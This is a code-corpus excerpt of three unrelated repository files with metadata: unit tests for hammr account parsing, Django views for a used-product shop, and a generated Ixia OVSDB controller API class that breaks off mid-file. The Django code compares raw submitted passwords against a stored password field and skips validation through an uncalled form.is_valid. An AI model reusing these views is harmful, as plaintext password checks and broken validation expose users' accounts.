] | miratava@gmail.com |
8af6d5e7f52ec995ce57a35bb38b8a4f8c621afa | b1771152725ddf5d568c6f31ec1d264d4d31c571 | /tests/unit/utils/test_account_utils.py | 7da58fd5334132911b59826dbc417677e90fab3c | [
"Apache-2.0"
] | permissive | Numerinico/hammr | d48232e4ac06babba40fa65cda827e22a77c8b7f | 08587fe74f7021e48c50cedaac9b11f0aefc81d8 | refs/heads/master | 2021-08-22T13:38:44.336425 | 2017-09-26T12:38:02 | 2017-09-26T12:38:02 | 104,996,640 | 0 | 0 | null | 2017-09-27T09:03:55 | 2017-09-27T09:03:55 | null | UTF-8 | Python | false | false | 4,238 | py | # Copyright 2007-2017 UShareSoft SAS, All rights reserved
#
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import TestCase
from hammr.utils.account_utils import *
class TestK5(TestCase):
def test_k5_should_return_cred_account_when_valid_entries(self):
# given
account_given = self.build_account("testName", "testLogin", "testPassword")
# when
account = k5(account_given)
# then
self.assertEqual(account.name, account_given["name"])
self.assertEqual(account.login, account_given["login"])
self.assertEqual(account.password, account_given["password"])
def test_k5_should_return_none_when_missing_name(self):
# given
account_given = self.build_account(None, "testLogin", "testPassword")
# when
account = k5(account_given)
# then
self.assertIsNone(account)
def test_k5_should_return_none_when_missing_login(self):
# given
account_given = self.build_account("testName", None, "testPassword")
# when
account = k5(account_given)
# then
self.assertIsNone(account)
def test_k5_should_return_none_when_missing_password(self):
# given
account_given = self.build_account("testName", "testLogin", None)
# when
account = k5(account_given)
# then
self.assertIsNone(account)
def build_account(self, name, login, password):
account = {}
if name is not None: account["name"] = name
if login is not None: account["login"] = login
if password is not None: account["password"] = password
return account
class TestDocker(TestCase):
def test_docker_should_return_cred_account_when_valid_entries(self):
# given
account_given = self.build_account("testName", "testUrl", "testLogin", "testPassword")
# when
account = docker(account_given)
# then
self.assertEqual(account.name, account_given["name"])
self.assertEqual(account.endpointUrl, account_given["endpointUrl"])
self.assertEqual(account.login, account_given["login"])
self.assertEqual(account.password, account_given["password"])
def test_docker_should_return_none_when_missing_name(self):
# given
accountMocked = self.build_account(None, "testUrl", "testLogin", "testPassword")
# when
account = docker(accountMocked)
# then
self.assertIsNone(account)
def test_docker_should_return_none_when_missing_url(self):
# given
accountMocked = self.build_account("testName", None, "testLogin", "testPassword")
# when
account = docker(accountMocked)
# then
self.assertIsNone(account)
def test_docker_should_return_none_when_missing_login(self):
# given
accountMocked = self.build_account("testName", "testUrl", None, "testPassword")
# when
account = docker(accountMocked)
# then
self.assertIsNone(account)
def test_docker_should_return_none_when_missing_password(self):
# given
accountMocked = self.build_account("testName", "testUrl", "testLogin", None)
# when
account = docker(accountMocked)
# then
self.assertIsNone(account)
def build_account(self, name, endpoint_url, login, password):
account = {}
if name is not None: account["name"] = name
if endpoint_url is not None: account["endpointUrl"] = endpoint_url
if login is not None: account["login"] = login
if password is not None: account["password"] = password
return account
| [
"ludovic.queiroga@usharesoft.com"
] | ludovic.queiroga@usharesoft.com |
9757249d899825c9dc56cd33cb82d62e434802c6 | bfaf1e27843882a20a691c304682dc43243642ce | /main_app/post_details/views.py | d95177d51d26b36ae51972a17d655c95bc7abbc9 | [] | no_license | hemel18681/Django_Used_Product_Online_Shop | 9e1c836895a5c3e1867519eb851f56287d74ab49 | a2217e83a991132473aabd549f2ff507946f1005 | refs/heads/master | 2023-04-07T22:29:18.223071 | 2021-04-20T18:08:51 | 2021-04-20T18:08:51 | 343,550,273 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,681 | py | from django.shortcuts import render,redirect
from django.http import HttpResponse
from django.contrib.auth import authenticate,login,logout
from django.contrib.auth.models import User
from django.contrib import messages
from authenticate.models import user_info
from post_details.models import pending_post, running_post
from django.contrib.auth.hashers import make_password
from django.core.mail import send_mail
from main_app.settings import EMAIL_HOST_USER
from django.core.files.storage import FileSystemStorage
from django.core.files.base import ContentFile
from PIL import Image
from .forms import make_post_form
def check_post(request):
user_name = request.session['user_name']
author = user_info.objects.filter(user_name=user_name)
details = author.values()
phone_number = details[0]['user_phone_number']
set_size = pending_post.objects.filter(user_phone_number=phone_number)
if set_size.count()== int(0):
if request.method=='POST':
form = make_post_form(request.POST, request.FILES)
if form.is_valid:
print(request.POST['user_phone_number'])
if user_info.objects.filter(user_name=user_name, user_password = request.POST['user_password']).exists():
form.save()
return redirect('home_page')
else:
messages.error(request,'username or password is wrong')
form = make_post_form()
context = {
'form': form,
}
return render(request,'post_manage/make_post.html',context)
else:
form = make_post_form()
context = {
'form': form,
}
return render(request,'post_manage/make_post.html',context)
else:
return render(request,'post_manage/wait_post.html')
def syncronize_post(request):
all_accept = pending_post.objects.filter(post_accept=True).all()
for star in all_accept.iterator():
saverecord = running_post()
saverecord.user_phone_number = star.user_phone_number
saverecord.post_title = star.post_title
saverecord.post_description = star.post_description
saverecord.post_picture = star.post_picture
saverecord.post_money = star.post_money
saverecord.post_used_days = star.post_used_days
saverecord.done_post = False
saverecord.post_given_date = star.post_given_date
saverecord.save()
pending_post.objects.filter(id=star.id).delete()
all_post = running_post.objects.all()
context = {
'all_post':all_post,
}
return render(request,'index.html',context)
def update_post(request,post_id):
id = post_id
if request.method=='POST':
form = make_post_form(request.POST, request.FILES,instance=running_post.objects.filter(id=id).first())
if form.is_valid():
user_phone_number = request.POST['user_phone_number']
if user_info.objects.filter(user_phone_number=user_phone_number, user_password = request.POST['user_password']).exists():
form.save()
messages.success(request,"Updated.")
else:
messages.success(request,"Username or Password maybe incorrect.")
else:
form = make_post_form(instance=running_post.objects.filter(id=id).first())
form = make_post_form(instance=running_post.objects.filter(id=id).first())
context = {
'form': form,
}
return render(request,'update_post.html',context) | [
"hemel18103112@gmail.com"
] | hemel18103112@gmail.com |
823d1a2718699ef51208e2f707d1e8d3994fa6a8 | 1c6283303ceb883add8de4ee07c5ffcfc2e93fab | /Jinja2/lib/python3.7/site-packages/ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/ovsdbcontroller_789ff2911c009a5ce719da4041ccbf73.py | f77a1ef26f1ad4fed45de942f83349bbf533fa7d | [] | no_license | pdobrinskiy/devcore | 0f5b3dfc2f3bf1e44abd716f008a01c443e14f18 | 580c7df6f5db8c118990cf01bc2b986285b9718b | refs/heads/main | 2023-07-29T20:28:49.035475 | 2021-09-14T10:02:16 | 2021-09-14T10:02:16 | 405,919,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53,934 | py | # MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class Ovsdbcontroller(Base):
"""
The Ovsdbcontroller class encapsulates a list of ovsdbcontroller resources that are managed by the user.
A list of resources can be retrieved from the server using the Ovsdbcontroller.find() method.
The list can be managed by using the Ovsdbcontroller.add() and Ovsdbcontroller.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'ovsdbcontroller'
_SDM_ATT_MAP = {
'ClearDumpDbFiles': 'clearDumpDbFiles',
'ConnectedVia': 'connectedVia',
'ConnectionType': 'connectionType',
'ControllerTcpPort': 'controllerTcpPort',
'Count': 'count',
'DescriptiveName': 'descriptiveName',
'DirectoryName': 'directoryName',
'DumpdbDirectoryName': 'dumpdbDirectoryName',
'EnableLogging': 'enableLogging',
'EnableOvsdbServerIp': 'enableOvsdbServerIp',
'ErrorCode': 'errorCode',
'ErrorDesc': 'errorDesc',
'ErrorLogDirectoryName': 'errorLogDirectoryName',
'ErrorLogicalSwitchName': 'errorLogicalSwitchName',
'ErrorPhysicalSwitchName': 'errorPhysicalSwitchName',
'ErrorTimeStamp': 'errorTimeStamp',
'Errors': 'errors',
'FileCaCertificate': 'fileCaCertificate',
'FileCertificate': 'fileCertificate',
'FileHWGatewayCertificate': 'fileHWGatewayCertificate',
'FilePrivKey': 'filePrivKey',
'HSCConfiguration': 'hSCConfiguration',
'LatestDumpDbFileNames': 'latestDumpDbFileNames',
'LatestErrorFileNames': 'latestErrorFileNames',
'Multiplier': 'multiplier',
'Name': 'name',
'OvsdbSchema': 'ovsdbSchema',
'OvsdbServerIp': 'ovsdbServerIp',
'PseudoConnectedTo': 'pseudoConnectedTo',
'PseudoConnectedToBfd': 'pseudoConnectedToBfd',
'PseudoConnectedToVxlanReplicator': 'pseudoConnectedToVxlanReplicator',
'PseudoMultiplier': 'pseudoMultiplier',
'PseudoMultiplierBfd': 'pseudoMultiplierBfd',
'PseudoMultiplierVxlanReplicator': 'pseudoMultiplierVxlanReplicator',
'Role': 'role',
'ServerAddDeleteConnectionError': 'serverAddDeleteConnectionError',
'ServerAddDeleteStatus': 'serverAddDeleteStatus',
'ServerConnectionIp': 'serverConnectionIp',
'SessionStatus': 'sessionStatus',
'StackedLayers': 'stackedLayers',
'StateCounts': 'stateCounts',
'Status': 'status',
'TableNames': 'tableNames',
'TimeOut': 'timeOut',
'VerifyHWGatewayCertificate': 'verifyHWGatewayCertificate',
'VerifyPeerCertificate': 'verifyPeerCertificate',
'Vxlan': 'vxlan',
'VxlanReplicator': 'vxlanReplicator',
}
_SDM_ENUM_MAP = {
'status': ['configured', 'error', 'mixed', 'notStarted', 'started', 'starting', 'stopping'],
}
def __init__(self, parent, list_op=False):
super(Ovsdbcontroller, self).__init__(parent, list_op)
@property
def ClusterData(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.clusterdata_14465bf77bf9eb0d40ce3ac056e3b337.ClusterData): An instance of the ClusterData class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.clusterdata_14465bf77bf9eb0d40ce3ac056e3b337 import ClusterData
if self._properties.get('ClusterData', None) is not None:
return self._properties.get('ClusterData')
else:
return ClusterData(self)._select()
@property
def Connector(self):
"""
Returns
-------
- obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b.Connector): An instance of the Connector class
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.connector_d0d942810e4010add7642d3914a1f29b import Connector
if self._properties.get('Connector', None) is not None:
return self._properties.get('Connector')
else:
return Connector(self)
@property
def ClearDumpDbFiles(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue):
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ClearDumpDbFiles']))
@property
def ConnectedVia(self):
# type: () -> List[str]
"""DEPRECATED
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of layers this layer is used to connect with to the wire.
"""
return self._get_attribute(self._SDM_ATT_MAP['ConnectedVia'])
@ConnectedVia.setter
def ConnectedVia(self, value):
# type: (List[str]) -> None
self._set_attribute(self._SDM_ATT_MAP['ConnectedVia'], value)
@property
def ConnectionType(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Connection should use TCP or TLS
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ConnectionType']))
@property
def ControllerTcpPort(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Specify the TCP port for the Controller
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ControllerTcpPort']))
@property
def Count(self):
# type: () -> int
"""
Returns
-------
- number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
"""
return self._get_attribute(self._SDM_ATT_MAP['Count'])
@property
def DescriptiveName(self):
# type: () -> str
"""
Returns
-------
- str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
"""
return self._get_attribute(self._SDM_ATT_MAP['DescriptiveName'])
@property
def DirectoryName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Location of Directory in Client where the Certificate and Key Files are available
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DirectoryName']))
@property
def DumpdbDirectoryName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Location of Directory in Client where the DumpDb Files are available
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['DumpdbDirectoryName']))
@property
def EnableLogging(self):
# type: () -> bool
"""
Returns
-------
- bool: If true, Port debug logs will be recorded, Maximum recording will be upto 500 MB .
"""
return self._get_attribute(self._SDM_ATT_MAP['EnableLogging'])
@EnableLogging.setter
def EnableLogging(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['EnableLogging'], value)
@property
def EnableOvsdbServerIp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue):
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['EnableOvsdbServerIp']))
@property
def ErrorCode(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Error Code
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorCode']))
@property
def ErrorDesc(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Description of Error occured
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorDesc']))
@property
def ErrorLogDirectoryName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Location of Directory in Client where the ErrorLog Files are available
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorLogDirectoryName']))
@property
def ErrorLogicalSwitchName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Error occured for this Logical Switch Name
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorLogicalSwitchName']))
@property
def ErrorPhysicalSwitchName(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Error occured for this Physical Switch Name
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorPhysicalSwitchName']))
@property
def ErrorTimeStamp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Time Stamp at which Last Error occurred
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ErrorTimeStamp']))
@property
def Errors(self):
"""
Returns
-------
- list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str])): A list of errors that have occurred
"""
return self._get_attribute(self._SDM_ATT_MAP['Errors'])
@property
def FileCaCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): CA Certificate File
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FileCaCertificate']))
@property
def FileCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Certificate File
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FileCertificate']))
@property
def FileHWGatewayCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): HW Gateway Certificate File
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FileHWGatewayCertificate']))
@property
def FilePrivKey(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Private Key File
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['FilePrivKey']))
@property
def HSCConfiguration(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Each VTEP has its own Hardware Switch Controller.
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['HSCConfiguration']))
@property
def LatestDumpDbFileNames(self):
# type: () -> str
"""
Returns
-------
- str: Api to fetch latest DumpDb Files
"""
return self._get_attribute(self._SDM_ATT_MAP['LatestDumpDbFileNames'])
@LatestDumpDbFileNames.setter
def LatestDumpDbFileNames(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['LatestDumpDbFileNames'], value)
@property
def LatestErrorFileNames(self):
# type: () -> str
"""
Returns
-------
- str: Api to fetch latest Error Files
"""
return self._get_attribute(self._SDM_ATT_MAP['LatestErrorFileNames'])
@LatestErrorFileNames.setter
def LatestErrorFileNames(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['LatestErrorFileNames'], value)
@property
def Multiplier(self):
# type: () -> int
"""
Returns
-------
- number: Number of layer instances per parent instance (multiplier)
"""
return self._get_attribute(self._SDM_ATT_MAP['Multiplier'])
@Multiplier.setter
def Multiplier(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['Multiplier'], value)
@property
def Name(self):
# type: () -> str
"""
Returns
-------
- str: Name of NGPF element, guaranteed to be unique in Scenario
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def OvsdbSchema(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Database schema
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['OvsdbSchema']))
@property
def OvsdbServerIp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): The IP address of the DUT or Ovs Server.
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['OvsdbServerIp']))
@property
def PseudoConnectedTo(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*): GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoConnectedTo'])
@PseudoConnectedTo.setter
def PseudoConnectedTo(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['PseudoConnectedTo'], value)
@property
def PseudoConnectedToBfd(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*): GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoConnectedToBfd'])
@PseudoConnectedToBfd.setter
def PseudoConnectedToBfd(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['PseudoConnectedToBfd'], value)
@property
def PseudoConnectedToVxlanReplicator(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*): GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoConnectedToVxlanReplicator'])
@PseudoConnectedToVxlanReplicator.setter
def PseudoConnectedToVxlanReplicator(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['PseudoConnectedToVxlanReplicator'], value)
@property
def PseudoMultiplier(self):
# type: () -> int
"""
Returns
-------
- number: Multiplier for GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoMultiplier'])
@property
def PseudoMultiplierBfd(self):
# type: () -> int
"""
Returns
-------
- number: Multiplier for GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoMultiplierBfd'])
@property
def PseudoMultiplierVxlanReplicator(self):
# type: () -> int
"""
Returns
-------
- number: Multiplier for GUI-only connection
"""
return self._get_attribute(self._SDM_ATT_MAP['PseudoMultiplierVxlanReplicator'])
@property
def Role(self):
# type: () -> List[str]
"""
Returns
-------
- list(str[master | none | slave]): The role of the OVSDB Controller.
"""
return self._get_attribute(self._SDM_ATT_MAP['Role'])
@property
def ServerAddDeleteConnectionError(self):
# type: () -> str
"""
Returns
-------
- str: API to retrieve error occured while Adding/ Deleting Server
"""
return self._get_attribute(self._SDM_ATT_MAP['ServerAddDeleteConnectionError'])
@ServerAddDeleteConnectionError.setter
def ServerAddDeleteConnectionError(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['ServerAddDeleteConnectionError'], value)
@property
def ServerAddDeleteStatus(self):
# type: () -> str
"""
Returns
-------
- str: Status of all servers Added/Deleted to Controller. Use Get Server Add/Delete Status, right click action to get current status
"""
return self._get_attribute(self._SDM_ATT_MAP['ServerAddDeleteStatus'])
@property
def ServerConnectionIp(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): The IP address of the DUT or Ovs Server which needs to be Added/Deleted.
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ServerConnectionIp']))
@property
def SessionStatus(self):
# type: () -> List[str]
"""
Returns
-------
- list(str[down | notStarted | up]): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
"""
return self._get_attribute(self._SDM_ATT_MAP['SessionStatus'])
@property
def StackedLayers(self):
# type: () -> List[str]
"""
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of secondary (many to one) child layer protocols
"""
return self._get_attribute(self._SDM_ATT_MAP['StackedLayers'])
@StackedLayers.setter
def StackedLayers(self, value):
# type: (List[str]) -> None
self._set_attribute(self._SDM_ATT_MAP['StackedLayers'], value)
@property
def StateCounts(self):
"""
Returns
-------
- dict(total:number,notStarted:number,down:number,up:number): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
"""
return self._get_attribute(self._SDM_ATT_MAP['StateCounts'])
@property
def Status(self):
# type: () -> str
"""
Returns
-------
- str(configured | error | mixed | notStarted | started | starting | stopping): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
"""
return self._get_attribute(self._SDM_ATT_MAP['Status'])
@property
def TableNames(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue):
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TableNames']))
@property
def TimeOut(self):
# type: () -> int
"""
Returns
-------
- number: Transact request Time Out in seconds. For scale scenarios increase this Timeout value.
"""
return self._get_attribute(self._SDM_ATT_MAP['TimeOut'])
@TimeOut.setter
def TimeOut(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['TimeOut'], value)
@property
def VerifyHWGatewayCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Verify HW Gateway Certificate
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['VerifyHWGatewayCertificate']))
@property
def VerifyPeerCertificate(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Verify Peer Certificate
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['VerifyPeerCertificate']))
@property
def Vxlan(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*):
"""
return self._get_attribute(self._SDM_ATT_MAP['Vxlan'])
@Vxlan.setter
def Vxlan(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Vxlan'], value)
@property
def VxlanReplicator(self):
# type: () -> str
"""
Returns
-------
- str(None | /api/v1/sessions/1/ixnetwork/topology/.../*):
"""
return self._get_attribute(self._SDM_ATT_MAP['VxlanReplicator'])
@VxlanReplicator.setter
def VxlanReplicator(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['VxlanReplicator'], value)
def update(self, ConnectedVia=None, EnableLogging=None, LatestDumpDbFileNames=None, LatestErrorFileNames=None, Multiplier=None, Name=None, PseudoConnectedTo=None, PseudoConnectedToBfd=None, PseudoConnectedToVxlanReplicator=None, ServerAddDeleteConnectionError=None, StackedLayers=None, TimeOut=None, Vxlan=None, VxlanReplicator=None):
# type: (List[str], bool, str, str, int, str, str, str, str, str, List[str], int, str, str) -> Ovsdbcontroller
"""Updates ovsdbcontroller resource on the server.
This method has some named parameters with a type: obj (Multivalue).
The Multivalue class has documentation that details the possible values for those named parameters.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- EnableLogging (bool): If true, Port debug logs will be recorded, Maximum recording will be upto 500 MB .
- LatestDumpDbFileNames (str): Api to fetch latest DumpDb Files
- LatestErrorFileNames (str): Api to fetch latest Error Files
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- PseudoConnectedTo (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToBfd (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToVxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- ServerAddDeleteConnectionError (str): API to retrieve error occured while Adding/ Deleting Server
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
- TimeOut (number): Transact request Time Out in seconds. For scale scenarios increase this Timeout value.
- Vxlan (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
- VxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, ConnectedVia=None, EnableLogging=None, LatestDumpDbFileNames=None, LatestErrorFileNames=None, Multiplier=None, Name=None, PseudoConnectedTo=None, PseudoConnectedToBfd=None, PseudoConnectedToVxlanReplicator=None, ServerAddDeleteConnectionError=None, StackedLayers=None, TimeOut=None, Vxlan=None, VxlanReplicator=None):
# type: (List[str], bool, str, str, int, str, str, str, str, str, List[str], int, str, str) -> Ovsdbcontroller
"""Adds a new ovsdbcontroller resource on the server and adds it to the container.
Args
----
- ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
- EnableLogging (bool): If true, Port debug logs will be recorded, Maximum recording will be upto 500 MB .
- LatestDumpDbFileNames (str): Api to fetch latest DumpDb Files
- LatestErrorFileNames (str): Api to fetch latest Error Files
- Multiplier (number): Number of layer instances per parent instance (multiplier)
- Name (str): Name of NGPF element, guaranteed to be unique in Scenario
- PseudoConnectedTo (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToBfd (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- PseudoConnectedToVxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)): GUI-only connection
- ServerAddDeleteConnectionError (str): API to retrieve error occured while Adding/ Deleting Server
- StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
- TimeOut (number): Transact request Time Out in seconds. For scale scenarios increase this Timeout value.
- Vxlan (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
- VxlanReplicator (str(None | /api/v1/sessions/1/ixnetwork/topology/.../*)):
Returns
-------
- self: This instance with all currently retrieved ovsdbcontroller resources using find and the newly added ovsdbcontroller resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
